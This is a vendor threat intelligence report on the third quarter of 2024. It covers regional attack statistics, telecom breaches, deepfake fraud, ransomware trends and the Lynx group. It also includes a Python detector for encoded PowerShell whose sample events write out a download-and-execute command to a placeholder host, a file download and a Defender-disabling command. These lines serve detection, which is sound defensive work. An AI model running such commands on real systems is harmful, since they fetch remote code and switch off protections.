Global Threat Intelligence Report

January 2025 Edition

Reporting Period: July 1 – September 30, 2024

Actionable Intelligence That Matters

This report provides a comprehensive review of the global threat landscape, with a focus on providing actionable intelligence that leaders can use to proactively secure their organizations. This report covers July through September 2024.

BlackBerry® cybersecurity solutions blocked nearly one million attacks against U.S. customers, identifying 80,000 unique malicious signatures and preventing 430,000 targeted attacks against commercial enterprises.

Read Cyberattacks Across the Globe for more information.

Of the nearly 600,000 critical infrastructure attacks detected this quarter, 45% targeted financial institutions.

Uncover our Cyber Threat Intelligence (CTI) team’s internal and external findings in the Critical Infrastructure section.

PowerShell-based attacks demonstrate threat actors' regional adaptation while maintaining consistent global techniques across NALA, APAC and EMEA.

Read how our MDR Team Analysis reveals evolving regional attack patterns and the global persistence of PowerShell-based threats.

The Law Enforcement Limelight section reveals ransomware's evolution toward targeted psychological warfare including increasingly weaponized exfiltrated data for reputation damage and strategic leverage rather than just financial gain.

Read more on the ransomware epidemic targeting Canada.


RansomHub now hosts major affiliates including LockBit and ALPHV, accounting for the majority of ransomware operations detected in Q3 2024.

Read more under Threat Actors and Tooling.

New ransomware group Lynx employs aggressive double-extortion tactics (combining data theft with encryption) and is expanding from North America and Australia into European markets.

Read our Prevalent Threats section to learn about trending threats across all major operating systems.

We provide a list of enhanced security protocols and countermeasures to address evolving ransomware tactics, with emphasis on exposure reduction and communication security.

View the list in the Risk Mitigation Strategies.

Find detailed mitigation strategies in response to Salt Typhoon breaches, focusing on critical communications infrastructure protection.

Explore defense strategies for protecting critical communications infrastructure.

Table of Contents

The BlackBerry® Global Threat Intelligence Report provides critical insights for CISOs and decision-makers, focusing on the most recent cybersecurity threats and challenges relevant to their specific industries and regions.

In 2024, numerous factors shaped the cybersecurity threat landscape. Key elections worldwide, ongoing conflicts and geopolitical tensions over various contentious issues created a volatile environment. This turmoil has empowered malicious actors and cyberthreat groups globally. These entities exploit uncertainty and unrest to gain financial profit, conduct cyberespionage, cause harm or amplify chaos.

Cyberattacks Across the Globe

BlackBerry's AI-Driven Cybersecurity Performance

During the three-month period from July to September 2024, BlackBerry's AI-driven cybersecurity solutions protected a wide variety of clients across the globe. Our security technology thwarted nearly two million cyberattacks and recorded over 3,000 unique malicious hashes daily targeting our customers.

The United States faced the highest volume of cyberattacks this quarter, far more so than any other country. BlackBerry’s cybersecurity technology blocked nearly one million attacks against U.S. customers, with approximately 80,000 involving the use of unique malicious hashes.

BlackBerry tracks the number of unique malicious hashes used in these attacks, compared to the total number of attacks. Often, commodity or "off-the-shelf" malware is reused in larger-scale attacks, leading to the same binary being identified multiple times.

Unique or novel malware is typically employed in highly targeted attacks. Here, threat actors invest considerable time and effort to create new malware with specific attributes, aiming to compromise a particular industry, organization or high-value target (HVT) through apparently small yet ultimately impactful attacks.

BlackBerry customers in the North America and Latin America (NALA) region logged the highest number of attempted attacks (i.e., attacks stopped by BlackBerry's cybersecurity solutions) and the greatest number of unique hashes. APAC (Asia and Pacific) ranked second and EMEA (Europe, Middle East, Africa) ranked third.

Figure 1: Attacks Stopped vs. Unique Hashes per region July - September 2024.

During this reporting period, the BlackBerry Managed Detection and Response (MDR) team's analysis revealed distinct regional patterns in threat activity. PowerShell-based attacks emerged as a consistent global threat, with Base64 encoded execution appearing in the top five detections across all regions — ranking first in NALA, fifth in APAC and third in EMEA.

Each region also showed unique threat characteristics:

  • NALA saw high volumes of system tool abuse, with renamed Sysinternals tools and LOLBAS (Living Off the Land Binaries and Scripts) shells among top concerns.
  • APAC faced significant credential theft attempts and defense evasion, targeting Windows Defender in particular.
  • EMEA showed diverse attack patterns, from PowerShell download commands to user account manipulation.

This regional variance in cyberattack patterns suggests threat actors are tailoring their approaches based on regional factors, while maintaining some consistent techniques globally.

Figure 2: Top five CylanceMDR alerts by region.

NALA

1st: Suspicious Base64 encoded PowerShell execution
2nd: Possible renamed Sysinternals tool was run
3rd: Services launched a LOLBAS shell
4th: Execution of remote access tools
5th: PowerShell download command execution

APAC

1st: Possible Windows credential theft
2nd: Svchost schedule task launches Rundll32
3rd: Windows Defender tampering via PowerShell
4th: Possible Msiexec abuse via DLL load
5th: Suspicious Base64 encoded PowerShell execution

EMEA

1st: PowerShell download command execution
2nd: Possible stdout command line abuse
3rd: Suspicious Base64 encoded PowerShell execution
4th: User account creation via Net Local Group Add
5th: Svchost schedule task launches Rundll32
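The Base64-encoded PowerShell and download-command alerts that recur in the rankings above rest on one core step: recovering the script hidden behind the -EncodedCommand switch and scanning it alongside the visible command line. The following Python is an added illustration of that step, written for this report and not CylanceMDR's actual detection logic; the sample command lines are constructed, the detection patterns are our own, and only the alert names are borrowed from the list above.

```python
import base64
import re
from typing import List, Optional, Tuple

# Illustrative indicator table (assumption: our own patterns, not BlackBerry's).
# Each entry maps a case-insensitive regex to the alert name it would raise.
INDICATORS = [
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                r"net\.webclient|start-bitstransfer", re.I),
     "PowerShell download command execution"),
    (re.compile(r"set-mppreference|add-mppreference", re.I),
     "Windows Defender tampering via PowerShell"),
]

# The encoded-command switch and its Base64 argument. PowerShell accepts
# unambiguous prefixes of -EncodedCommand; the short forms here are the common
# ones (assumption: the argument is a single, optionally quoted token).
ENCODED_SWITCH = re.compile(
    r'(?<!\S)-(?:e|ec|enc|encodedcommand)\s+"?([A-Za-z0-9+/=]{16,})', re.I)

BASE64_ALERT = "Suspicious Base64 encoded PowerShell execution"


def encode_for_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then Base64.
    Used here only to construct sample events."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded_command(cmdline: str) -> Tuple[bool, Optional[str]]:
    """Return (switch_present, decoded_script).

    decoded_script is None when the switch is absent or when the argument is
    not valid Base64-wrapped UTF-16LE (a corrupt or truncated payload)."""
    match = ENCODED_SWITCH.search(cmdline)
    if not match:
        return False, None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return True, raw.decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are ValueErrors
        return True, None


def analyze_command_line(cmdline: str) -> dict:
    """Classify one process-creation command line into zero or more alerts."""
    encoded, decoded = extract_encoded_command(cmdline)
    alerts: List[str] = []
    if encoded:
        # Encoding alone is worth a triage alert, whatever the payload says.
        alerts.append(BASE64_ALERT)
    # Scan the visible command line with the Base64 blob masked out (so random
    # Base64 text cannot match an indicator) plus the decoded script, so an
    # indicator hidden behind the encoding is still caught.
    visible = ENCODED_SWITCH.sub("-EncodedCommand <blob>", cmdline)
    haystack = visible + "\n" + (decoded or "")
    for pattern, name in INDICATORS:
        if pattern.search(haystack):
            alerts.append(name)
    return {"encoded": encoded, "decoded": decoded, "alerts": alerts}


def build_sample_events() -> List[str]:
    """Constructed process-creation command lines (not real telemetry).
    example.invalid is a reserved, non-routable test domain."""
    return [
        # benign: plain service query, nothing encoded
        'powershell.exe -NoProfile -Command "Get-Service -Name Spooler"',
        # benign content but encoded: Base64 alert still fires for triage
        "powershell.exe -enc " + encode_for_powershell("Get-ChildItem C:\\Logs"),
        # encoded download stub: Base64 alert plus download alert
        "powershell.exe -w hidden -e " + encode_for_powershell(
            "IEX (New-Object Net.WebClient).DownloadString("
            "'http://example.invalid/a.ps1')"),
        # encoded Defender tampering: Base64 alert plus tampering alert
        "powershell.exe -ec " + encode_for_powershell(
            "Set-MpPreference -DisableRealtimeMonitoring $true"),
        # plain-text download cmdlet: download alert only
        'powershell -c "Invoke-WebRequest -Uri http://example.invalid/u '
        '-OutFile C:\\Temp\\u.bin"',
        # encoded switch with a corrupt argument: undecodable but still flagged
        "powershell.exe -enc QUJDREVGR0hJSktMTU5PUA!!",
    ]


def run_detection(events: List[str]) -> List[dict]:
    """Analyze every event and return the results in input order."""
    return [analyze_command_line(e) for e in events]


if __name__ == "__main__":
    for event, result in zip(build_sample_events(), run_detection(build_sample_events())):
        print(event[:60].ljust(60), "->", result["alerts"] or ["no alert"])
```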

Geopolitical Analysis and Comments

It has been more than a decade since Leon Panetta, then the U.S. Secretary of Defense, warned of a potential “Cyber Pearl Harbor,” highlighting the prospect of a crippling cyberattack on U.S. critical infrastructure that would cascade across the cyber-physical world. While his dire warning has not yet materialized, our reliance on digital technologies that are vulnerable to attack, exploitation and manipulation has grown. Some have characterized the predicament that our digitized societies face as a “devilish bargain” that has compromised security for the sake of economic growth, increased productivity and convenience.

Ten years ago, there were only a handful of mainly state actors capable of carrying out sophisticated cyberattacks. Today, there are hundreds of state and non-state actors. The latest National Cyber Threat Assessment from the Canadian government, along with cyberthreat assessments from other allied countries such as the UK, characterize the state of cyber insecurity as increasingly unpredictable with a growing cast of aggressive threat actors that are adopting new technologies and tactics to improve and amplify their malicious activities.

The impact of this proliferation is pervasive. According to the Global Anti-Scam Alliance, an estimated 25.5% of the world’s population was impacted by cyber-enabled fraud in 2023. In the UK, more than 70% of medium and large businesses and nearly 66% of high-income charities have experienced some form of cybersecurity breach. In Canada, more than two-thirds (70%) of Canadians experienced a cybersecurity incident in the past year. BlackBerry’s own analysis confirms these trends and highlights the increase in cyberattacks against critical infrastructure.

Ransomware is widely regarded as the most disruptive form of cybercrime and there is a growing fear that “ransomware could cripple countries, not just companies.” In fact, ransomware attacks on critical infrastructure, such as the healthcare sector, are up significantly. In the United States, the Department of Health and Human Services reported a 278% increase in large data breaches involving ransomware at hospitals between 2018 and 2022. And, as the number of ransomware attacks proliferates, so do the variety of tactics and techniques used by ransomware actors. Ransomware groups now employ multifaceted extortion strategies that involve the exfiltration and encryption of victim data while also maintaining data leak sites on the dark web where stolen data from non-compliant victims is posted. The web of criminality is becoming increasingly complex.

The challenge is not just technical. The alarming reality is that cybercrime operations are having a negative impact on human welfare. Researchers have documented a 35% to 41% increase in in-hospital mortality in the wake of a ransomware attack on a hospital. Other studies have highlighted how ransomware attacks have a cascading effect on adjacent emergency departments, causing significant operational disruption and negatively impacting ambulance arrivals, treatment waiting times and patient care.

Another alarming trend has been the emergence of a cybercrime-related human trafficking industry. The United Nations has documented approximately 220,000 people trafficked into cybercrime operations in Southeast Asia in 2023. These individuals face threats to their lives and are subjected to torture and cruel, inhumane and degrading treatment or punishment, arbitrary detention, sexual violence, forced labor and other forms of exploitation. Organized crime groups have been running such operations out of Cambodia for more than a decade and have since expanded to other countries such as Myanmar, Thailand, Laos and the Philippines. In some cases, people are trafficked to these forced cybercrime operation sites in Southeast Asia from as far away as Brazil and East Africa.

As cyberthreats proliferate, governments and industry are working hard to disrupt the ransomware ecosystem and strengthen our collective ability to deter malicious cyber actors. In October 2024, BlackBerry and Public Safety Canada agreed to co-chair the Public-Private Sector Advisory Panel of the International Counter Ransomware Initiative (CRI). Along with the 68 member states of the CRI, BlackBerry works to strengthen collective resilience against ransomware and better equip governments around the world to counter the menace of ransomware and other cyber-related threats.


Cyberattack Landscape by Industry

Shifting from a global perspective to an industry-specific focus, BlackBerry analysts identified the primary targets of threat actors. For the purposes of this report, industry sectors are consolidated into two major categories: critical infrastructure and commercial enterprises.

BlackBerry gathers telemetry and statistics on critical infrastructure customers across the 16 industry sectors defined by the Cybersecurity and Infrastructure Security Agency (CISA). These include healthcare, government, energy, finance and defense. Commercial enterprises are those that engage in the production, distribution or sale of goods and services. These enterprises operate in various sectors such as manufacturing, retail and services. Figure 3 below shows the distribution of attacks and unique hashes across critical infrastructure and commercial enterprise.

Figure 3: Distribution of attacks and unique hashes across critical infrastructure and commercial enterprise, April - June 2024 vs. July - September 2024.

Critical Infrastructure Threats

Critical infrastructure can be a potentially lucrative target for cybercriminals. The valuable data held by these industries is often sold on underground markets, used for planning future attacks or leveraged for espionage. There has been a recent surge in attacks focused on critical infrastructure sectors such as healthcare, energy, finance and defense. For organizations in these sectors, downtime is costly. They are more likely to pay a ransom to restore systems quickly due to the potential losses that they and their customers might incur from downtime and lack of access to critical data.

With more services being digitized and more systems than ever before being connected to the Internet, organizations in these sectors often find themselves in the crosshairs of cybercriminals. These criminal groups range from novice hackers seeking peer recognition to organized nation-state threat actors and established ransomware groups seeking to inflict chaos on their enemies. The impact of these attacks can be devastating, affecting national security and disrupting essential operations as well as risking both economic stability and even human lives.

BlackBerry cybersecurity solutions, including CylanceENDPOINT™, thwarted nearly 600,000 attacks on critical infrastructure this quarter, with 45% of these attacks targeting the financial sector. Finance continues to be a popular target for cyberattackers.

Figure 4: Breakdown of attacks and unique hashes by critical infrastructure sectors.

In this next section, we’ll take a closer look at some of the most prevalent threats to critical infrastructure that we’ve encountered this quarter. The first part lists the types of threats that BlackBerry most commonly identifies and guards against within its customer base. The second part covers threats reported by third parties, such as industry news publications, security vendors or government agencies.

Figure 5: Distribution of BlackBerry internal threats across critical infrastructure this quarter.

Commercial Enterprise Threats

The commercial enterprise industry, spanning sectors like capital goods, retail and wholesale trade, is a prime target for sophisticated cyberattacks. Successful breaches may lead to compromised networks, data loss, operational disruptions, reputational harm and significant financial costs.

This quarter, BlackBerry cybersecurity solutions stopped over 430,000 targeted attacks against commercial enterprise businesses. The chart below illustrates the industries that received the largest volume of attempted attacks and unique malware hashes.

Figure 6: Distribution of blocked attacks and unique hashes in commercial enterprise industries.

Figure 7: Top internal threats against commercial enterprise from July to September 2024.

Communications Security: Threats and Mitigations

Due to its near-universal use, modern telecommunications infrastructure now faces an unprecedented array of sophisticated threats targeting its fundamental operations and data flows. From nation-state actors conducting large-scale espionage to cybercriminal enterprises offering "interception-as-a-service," these threats exploit the inherent trade-offs between global connectivity and security in each nation’s public telecom networks.

As organizations increasingly rely on mobile and digital communications for sensitive operations, the security gaps in these networks have become critical vulnerabilities that could potentially expose competitive advantages, strategic plans and confidential information. The recent cascade of telecom provider breaches demonstrates that no organization can assume their communications are secure simply because they're using standard carrier services.

Earlier this quarter, AT&T disclosed a major security breach in which threat actors compromised the call and text records of their cellular customers over an extended period; we now know that multiple telecom organizations were infiltrated. Some U.S. leaders called it “the worst telecom breach in our nation’s history.” The AT&T breach was highly significant because it impacted not only AT&T subscribers, but also anyone worldwide who had communicated with an AT&T customer during the affected period. The compromised data included potentially valuable metadata about communication patterns, timing of calls and relationships between users.

In this section, we will explore the various types of entities that are threatening communications infrastructure, the tactics they use and mitigations that organizations can take to protect their data.


Threat Actors

Nation-state actors represent a significant threat to international telecommunications security, as evidenced by recent events in which Chinese government-linked attackers conducted a sweeping cyber-espionage campaign. These sophisticated actors targeted major telecom companies to access mobile phone data of prominent figures, including U.S. presidential candidates.

U.S. government officials believe a threat actor known as Salt Typhoon, closely linked to China's Ministry of State Security, is the culprit behind the telecommunications infiltration campaign. Their operations affected multiple major carriers including Verizon, AT&T and T-Mobile, with investigators discovering they had remained undetected in these networks for over a year.

Criminal entities have evolved over time to provide highly specialized attack services within the telecommunications sector. These include organizations that offer "call-interception-as-a-service" and operate "wire-tapping-as-a-service" platforms with services readily available for purchase on the Internet. Some threat actors have developed capabilities to redirect and intercept cellular connections for any phone number without the end user's awareness.

The telecommunications sector also faces threats from adversaries seeking to gain advantages through communications exploitation. These actors target high-profile individuals and organizations using intercepted data for blackmail attempts or to expose confidential relationships to undermine public trust in the targeted individual. Of particular concern is their ability to identify and potentially expose high-profile supporters of political candidates who are attempting to remain out of public view or individuals whose physical safety relies on their anonymity, such as journalists, reporters and political activists.

Identified Threats

The inherent vulnerabilities in telecommunications networks can potentially expose organizations to a complex web of interconnected threats. While public telecom networks excel at providing global reachability, this accessibility comes with security trade-offs that malicious actors can (and often do) exploit.

From direct communication interception to sophisticated metadata analysis, these threats target not just the content of communications but also the patterns and relationships they reveal. Recent breaches of major telecom providers have demonstrated that these threats are not merely theoretical but represent active risks to employer-employee confidentiality, competitive advantage and even national security. Some of these risks include:

Communication Interception: Threat actors can intercept both audio/video calls and SMS messages, allowing them to eavesdrop on communications in real-time. Many of the risks these vulnerabilities present to standard telephony also exist in the free apps used for voice calls and messaging.

Metadata Exploitation: With metadata exploitation, threat actors collect and analyze both call detail records (CDR) and message detail records (MDR). This data enables them to construct detailed maps of contact relationships and analyze communication patterns including frequency, time of day and call duration. Real-time visibility into this metadata allows threat actors to track the subscribers of individual telecoms and identify exploitable communication patterns.

Vice President of BlackBerry Threat Research and Intelligence Ismael Valenzuela explains, “Telecommunications metadata can be a goldmine for cybercriminals. Even if the contents of calls and texts aren’t leaked, knowledge of the context behind these calls, such as who a person calls, how often and when, can be easily weaponized. Threat actors can figure out approximately where you live, where you work, who you talk to most often and even if you call any potentially sensitive numbers, such as healthcare providers.”

Identity-Based Attacks: The lack of identity validation in public networks makes identity and phone number spoofing endemic and almost impossible to prevent. Threat actors can use stolen metadata to specifically target telecom subscribers by spoofing numbers they have already been communicating with. Those who pick up will most likely be subjected to robo-calls, but in some cases attackers may use new technologies such as deep-voice generators to engineer complex identity scams.

Cloning the voice of a real person using generative AI is known as an audio deepfake. These types of attacks are rapidly gaining momentum in the corporate world as attackers quite literally rely on employees trusting the voice of someone they know — such as their boss — and abuse this trust to perpetuate high-dollar financial scams.

Infrastructure Vulnerabilities: The modern telecommunications infrastructure contains particularly difficult challenges. Fixes often require wholesale replacement of system components, which can cause service disruptions and require significant investment from telecommunications providers.

  • Legacy System Components: Critical parts of the telecommunications backbone still run on systems from the 1970s and 1980s that predate modern cybersecurity protections and were designed primarily for landline operations. To upgrade these aging components to align with current security measures, they would need to be strengthened by routing communications through secure relay networks and implementing end-to-end encryption that safeguards both the data content and its transmission patterns.
  • Network Access Points: The carrier-interconnect cellular-roaming protocols contain inherent weaknesses that allow malicious actors to redirect and intercept cellular connections. This vulnerability exists across all major carriers including AT&T, Verizon and T-Mobile, as demonstrated by Salt Typhoon's successful exploitation of network nodes across multiple providers.
  • Authentication Systems: Basic security controls like multi-factor authentication are notably absent in some critical telecommunications infrastructure components. This gap allows threat actors to maintain persistent access once they've gained initial entry.
  • Monitoring Systems: The "lawful intercept" infrastructure, designed for legal surveillance operations, can be compromised to reveal sensitive operational data about ongoing investigations and surveillance targets.
  • Data Transit Points: The interconnections between Internet service providers and telecommunications networks create additional vulnerability points where unencrypted email and other communications can be intercepted.
  • Global Routing Infrastructure: The fundamental design of telecommunications networks prioritizes global connectivity over security, creating inherent vulnerabilities in how calls and data are routed between providers and across regions.

Intelligence Gathering: Telecommunications breaches greatly assist threat actors in their intelligence gathering capabilities. Threat actors can use leaked information to conduct real-time surveillance of specific subscribers and, in some cases, identify hidden relationships. In the context of political campaigns, this surveillance enables them to discover high-profile supporters attempting to maintain privacy and expose confidential connections. This intelligence can reveal additional communication patterns that may also be exploited in unexpected ways.

“You may feel you have nothing an attacker could want,” adds Valenzuela, “but just knowing who you call most regularly and who you’d be most likely to trust and therefore pick up a call from makes it easier for cybercriminals to perpetuate any one of a multitude of phone-based scams, including those that rely on deepfake audio to spoof the voice of a person you know.”

Secondary Threats: The exploitation of telecommunications vulnerabilities can lead to secondary threats. These include blackmail attempts, particularly when confidential relationships are exposed. Additionally, the compromised information can be used for competitive intelligence gathering and espionage. If a high-profile person, entity or organization is compromised, this may even impact democratic processes and threaten national security.

According to David Wiseman, Vice President of BlackBerry SecuSUITE®, "Secrets that provide competitive advantages — whether in the marketplace or on the battlefield — are vulnerable to exposure. Public telecom networks are primarily designed for accessibility, which often leads to security compromises."

A significant issue with public networks including encrypted messaging platforms is their open nature, allowing virtually anyone to join. Wiseman explains, "On platforms like Signal or WhatsApp, users self-register which contributes to problems such as identity spoofing, fraud and concerns over deepfakes. Open systems with self-registration are inherently high-risk."

Mitigations

To counter the evolving landscape of telecommunications threats, organizations must implement comprehensive security measures that go beyond basic encryption. While consumer-grade communication tools offer some measure of protection, they fall short of addressing sophisticated attacks targeting both message content and metadata.

Effective defense requires a multi-layered approach that combines technological solutions with strategic protocols and human vigilance. The following strategies provide a framework for organizations to protect their sensitive communications from nation-state actors, criminal entities and other threat actors seeking to exploit telecommunications vulnerabilities.

Authentication and Identity Verification: Multi-factor authentication (MFA) and identity verification protocols serve as critical first-line defenses against unauthorized access and social engineering attacks.

  • Tactic: Implement robust authentication systems while training users to verify unexpected communications through alternative or secondary channels.
  • Example: When an executive receives an urgent message from a board member outside normal hours making an unusual request, they follow protocol by verifying through a separate pre-established communication channel.

Link and Message Security: Social engineering attacks exploit trust in familiar phone numbers and message sources to distribute malicious content.

  • Tactic: Establish strict protocols for link handling and implement systems that scan and verify message content before delivery.
  • Example: A banking institution implements a no-click policy on external links, requiring all important communications to occur within their own secure platform.

Infrastructure Control: Organizations need complete oversight of their communication channels to prevent unauthorized access and maintain security standards.

  • Tactic: Deploy communication systems where the organization maintains full control over infrastructure, user authorization and security protocols.
  • Example: A defense contractor implements a closed-loop communication system where all users must be pre-authorized and all communications are routed through monitored, secure channels.

Metadata Protection: Communication patterns and metadata can reveal sensitive information, even when message content is secure.

  • Tactic: Encrypt and tunnel all metadata including caller information, communication duration and relationship patterns between users.
  • Example: A financial institution prevents competitors from mapping their merger discussions by encrypting not just the communications but also the patterns of which executives are communicating with each other.

Mobile Security Enhancement: Mobile communications present unique security challenges requiring specialized cryptographic solutions.

  • Tactic: Implement certified cryptographic authentications for all mobile communications to prevent call spoofing, fraud and unauthorized access.
  • Example: A government agency deploys mobile devices with built-in cryptographic authentication, ensuring all communications are verified and secure regardless of location.

Data Lifecycle Control: Traditional communication systems relinquish control of data once shared, creating permanent security vulnerabilities.

  • Tactic: Maintain organizational ownership of all shared data with the ability to revoke access or delete content at any time.
  • Example: When an executive leaves a Fortune 100 company, the organization immediately revokes access to all previously shared documents and communications.

Social Engineering Defense: Basic human behavior often presents the greatest security vulnerability in communication systems.

  • Tactic: Implement comprehensive training programs supported by automated systems to detect and prevent social engineering attempts.
  • Example: An organization's secure communication platform automatically flags and requires additional verification for any unusual communication patterns or requests.

Risk Assessment Integration: Security measures must be tailored to specific organizational risks and regulatory requirements.

  • Tactic: Regularly assess communication security risks and adjust protocols based on emerging threats and compliance needs.
  • Example: A healthcare provider conducts quarterly assessments of their communication security measures, updating protocols based on new threat intelligence and regulatory changes.

Holistic Security Integration: Communication security must be integrated into a broader cybersecurity strategy.

  • Tactic: Ensure secure communications work in concert with other security measures and protocols.
  • Example: A manufacturing firm integrates their secure communication platform with their access control and data loss prevention systems, creating a unified security ecosystem.

Temporary Data Architecture: Persistent data storage increases vulnerability to breaches and unauthorized access.

  • Tactic: Implement systems that minimize data persistence through temporary storage and automatic purging protocols.
  • Example: A legal firm's communication platform automatically deletes messages from servers immediately after confirmed delivery to all authorized recipients.

Read our blog to learn more about how threat actors use and abuse stolen metadata from mobile communications.

The Dangers of Deepfakes

The FBI recently released a warning about cybercriminals using generative AI to commit large-scale fraud, targeting commercial enterprise and financial organizations with elaborate scams. The advisory warns about the ramifications of deepfake videos and voice calls, as well as AI-generated profile images used to impersonate people in hiring scams, such as the North Korean campaign to infiltrate Western IT companies with spies posing as remote workers.

This newly expanded cyberattack surface is a very real threat to commercial enterprises of all sizes, with losses projected to reach a staggering $40 billion by 2027. As BlackBerry's Senior VP of Product Engineering and Data Science, Shiladitya Sircar, recently explained in an episode of Daniel Miessler's Unsupervised Learning podcast, "This type of generative AI adversary creates new attack vectors with all of this multimodal information that no one sees coming. It creates a more complex, nuanced threat landscape that prioritizes identity-driven attacks, and it'll only get better."

The implications for business are profound. When stakeholders can no longer trust the authenticity of executive communications, every aspect of operations is affected — from market-moving announcements to internal strategic directives. The banking and financial services sector has emerged as the primary target, facing unprecedented challenges in maintaining secure communications and transaction verification processes. As Sircar notes, "The most concerning aspect of these deepfakes is the potential for eroding trust — trust in systems that are legitimate, that are true."

Forward-thinking organizations are already positioning themselves ahead of emerging regulatory requirements, including the U.S. No AI Fraud Act and Canadian legislation on non-consensual media. These regulatory developments signal a crucial shift in how businesses must approach communication security and identity verification.

As deep-voice and generative AI voice alteration software improves, it's likely these tools will be used more frequently in a growing number of targeted attacks. If you'd like to learn more about deepfakes, including mitigations you can use to help protect your organization, you can download our white paper on deepfakes here, or listen to our full discussion with Shiladitya Sircar on the Unsupervised Learning podcast.

If you believe you’ve been a victim of a deepfake fraud scheme, you can file a report with the FBI's Internet Crime Complaint Center at www.ic3.gov.

Law Enforcement Limelight

BlackBerry works with law enforcement agencies around the world to improve public-private collaboration on cybersecurity. Beginning with the September 2024 Global Threat Intelligence Report, BlackBerry is collaborating with the Royal Canadian Mounted Police’s National Cybercrime Coordination Centre (NC3) to share intelligence. The following information has been provided by the NC3 to highlight cybercrime trends from a law enforcement perspective.

Historical Background: The Rise of Ransomware Groups

The ransomware ecosystem has evolved significantly since the first recorded attack in 1989, when the AIDS trojan horse was released. Ransomware evolution was gradual prior to the emergence of cryptocurrency in 2010. The Bitcoin era, however, has spurred rapid growth in cyberthreats, especially over the last half decade.

In 2019, groups such as MAZE, Ryuk and Sodinokibi/REvil were wreaking havoc by encrypting computer systems and networks and demanding payments for decryption keys. This was an effective attack strategy at the time because few organizations maintained system backups and still fewer had cyber incident response plans.


The Ever-Evolving Ransomware Threat

During this time, ransomware operations were viewed much like traditional organized crime groups: skilled cybercriminals coming together for a common cause or purpose. Since then, ransomware groups have become very adaptive adversaries and, as cybersecurity practices have improved, so have the tactics, techniques and procedures (TTPs) of ransomware operators.

To ensure financial gain, ransomware groups moved from single extortion (data encryption only) to double extortion tactics, demanding ransom payments for the decryption key and additionally to keep stolen data from being sold on the dark web.

The number of ransomware operations has also steadily increased, with old groups rebranding, new groups entering the ecosystem and new business models emerging. Ransomware-as-a-Service (RaaS), as well as faster encryption methods, better obfuscation techniques and the ability to target multiple operating systems, are some of the notable advancements over the past few years.

While some ransomware operations continue to encrypt files and systems, others have chosen to forego this step and move to an exfiltration-only model. This change in approach is likely a response to the adoption of better cybersecurity practices and the increased use of system backups and disaster recovery services.

A Third Element of Extortion

More recently, ransomware operations have added a third element of extortion. As opposed to only exfiltrating data and threatening to post it online, some ransomware operations are taking the time to analyze stolen data and weaponize it to increase pressure on victims who refuse to pay. This strategy may involve sharing the contact details or doxing the family members of targeted CEOs and business owners, as well as threatening to report any information about illegal business activities uncovered in the stolen data to the authorities. The ransomware operators may threaten to contact customers or clients, or worse, launch additional attacks if ransom demands are not met.

In addition, the NC3 has seen a considerable number of new ransomware variants emerge. The ransomware ecosystem appears to comprise heterogeneous groups of individuals with skillsets ranging from social engineering, initial access brokering, advanced encryption, malware development, negotiation and even public relations. The ransomware ecosystem is a complicated interconnected network. Combating ransomware operations requires an equally complex, multi-disciplinary approach.

Law Enforcement Challenges

For law enforcement, the continued evolution in the ransomware space represents a considerable challenge that requires innovative solutions. Ransomware is a top global threat, and it is likely to persist as long as victims continue to pay.

From prior law enforcement crackdowns on high-profile ransomware groups such as Hive, BlackCat and LockBit, we know that ransomware actors can quickly adapt their tactics to thwart law enforcement efforts. These adaptive efforts have fragmented the ransomware ecosystem, forcing law enforcement to adopt multifaceted strategies that include creative methods for disrupting operations (e.g., targeting infrastructure, reputation and trust).

Top 10 Canadian Ransomware Threats

The NC3 works closely with domestic and international law enforcement, government partners, private industry and academia to continuously improve the Canadian law enforcement response to cybercrime. In addition to contributing to and supporting specific cybercrime law enforcement operations, the National Cybercrime Coordination Centre routinely monitors the evolution of the cyberthreat landscape and conducts a tri-annual assessment of the ransomware operators targeting Canada. This systematic assessment informs the cybersecurity industry of changes in the cybercrime ecosystem and helps direct investigative resources.

The table below tracks the most prevalent ransomware threats in Canada for the May through August 2024 reporting period, which overlaps with the period this report covers.

Figure 8: Canadian ransomware threats, May – August 2024.

Emerging Group Spotlight – Lynx Ransomware

The Lynx ransomware group first appeared on the threat landscape in July 2024 and quickly accumulated more than 25 victims during the following months. Targeted organizations were split across a wide range of industries and located primarily across North America and Europe.

What is the Lynx Group?

The Lynx group, like many ransomware operators today, uses a double-extortion strategy. After unlawfully accessing a system or network, they first exfiltrate sensitive data before encrypting it, making it inaccessible to the owner. They then threaten to publicly release the data if the ransom isn't paid. When an organization is breached by Lynx, the group publishes a blog post on a leak site — accessible via the public Internet or the dark web, or sometimes both — “naming and shaming” the victim.

Figure 9: Screen capture of the Lynx dark web leak site.
The stolen data may be further leveraged by the group in ransom negotiations, with the threat of more information being published if the victim fails to meet additional ransom demands.

Industries and Regions Targeted by Lynx

In the images below, you can see the areas and industries where Lynx is more prevalent. Lynx primarily targets North American and Australian organizations, but also the UK and parts of Europe.
Figure 10: Lynx’s geographic distribution of victims.
Figure 11: Key industries targeted by Lynx.

How Lynx Operates

Lynx maintains both a surface website and a deep web leak site along with a series of mirrored sites located at “.onion” addresses — presumably to ensure uptime should any of their sites be taken offline by law enforcement. They also employ their own encryptor which, upon closer examination by BlackBerry researchers, appears to have been developed from the same codebase as the one used by the infamous INC Ransom group.

To date, a handful of samples related to the encryptor utilized by the Lynx group have been identified in the wild. All samples appear to be written in C++ and lack any form of packing or obfuscation to impede analysis.

Once pre-encryption objectives such as gaining initial access and exfiltrating data have been completed, the ransomware is deployed in the victim's environment. The ransomware itself is designed to be executed from the command line and supports several optional arguments, which lets an attacker tailor the file-encryption behaviour to their goals.

Upon execution, the malware further supports a “--verbose” mode that will print a list of operations the ransomware is conducting as it is dynamically running.

Figure 12: Lynx encryptor running in verbose mode.

To prevent a victim’s device from becoming inoperable, the malware omits certain file types and Windows folders from encryption. This serves a dual purpose: it speeds up encryption and prevents critical Windows programs from becoming inaccessible, which would “brick” the device and ruin the group’s chance of holding it to ransom.

For a more detailed analysis of this emerging threat, read our full report on Lynx.

Operational Security Measures

Regular security awareness training is vital in cultivating a vigilant organizational culture. Topics such as phishing prevention, credential security and remote access security should be emphasized.

  • Tactic: Implement a "Spot the Red Flag" training program in which employees receive simulated phishing emails containing common deceptive elements followed by immediate educational feedback explaining each suspicious indicator. Track employee response rates and provide targeted follow-up training based on individual performance metrics.
